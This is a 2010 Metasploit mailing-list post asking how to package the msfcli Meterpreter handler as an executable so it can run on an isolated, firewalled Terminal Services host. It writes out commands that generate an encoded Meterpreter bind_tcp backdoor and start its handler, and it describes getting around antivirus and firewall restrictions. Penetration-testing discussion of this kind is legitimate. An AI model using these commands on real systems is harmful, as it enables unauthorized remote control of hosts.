Metasploit mailing list archives

Is possible generate a .exe of the meterpreter (msfcli side)?


From: Richard Miles <richard.k.miles () googlemail com>
Date: Wed, 1 Dec 2010 18:35:07 -0600

Hi,

I know that I can generate a stand alone meterpreter backdoor doing
the following

./msfpayload windows/meterpreter/bind_tcp LHOST=MyIP R | ./msfencode
-e x86/shikata_ga_nai -t exe > bind.exe

And it work very well. And on the attacker box I just have to do:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LHOST=MyIP E

And it works fine.

However, I tested a server that is full isolated, only Terminal
Service is opened, all others are filtered. So, I logged via terminal
service and uploaded bind.exe (meterpreter), but I also realized that
all outgoing connections to my network are filtered by a firewall. We
are in different network segments and the firewall between us blocks
all outgoing connection from the terminal service to me, and just
allow me to connect on the terminal service port. So, I'm unable to
execute meterpreter.

My first guess was upload Metasploit portable to the terminal service
to lunch both meterpreter client and meterpreter server on the
localhost, but it failed, they have a antivirus and when I copy it the
AV detect the stuff and delete everything.

So, my best try would be create a executable for msfcli (meterpreter)
and upload it to terminal service and use both meterpreter
server/client locally (127.0.0.1) just to be able to access the nice
features that meterpreter provide.

There is a way to create a executable of the following command
(./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp
LHOST=MyIP E) ? How?

Other ideas and suggestions are welcome.

Tank you.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: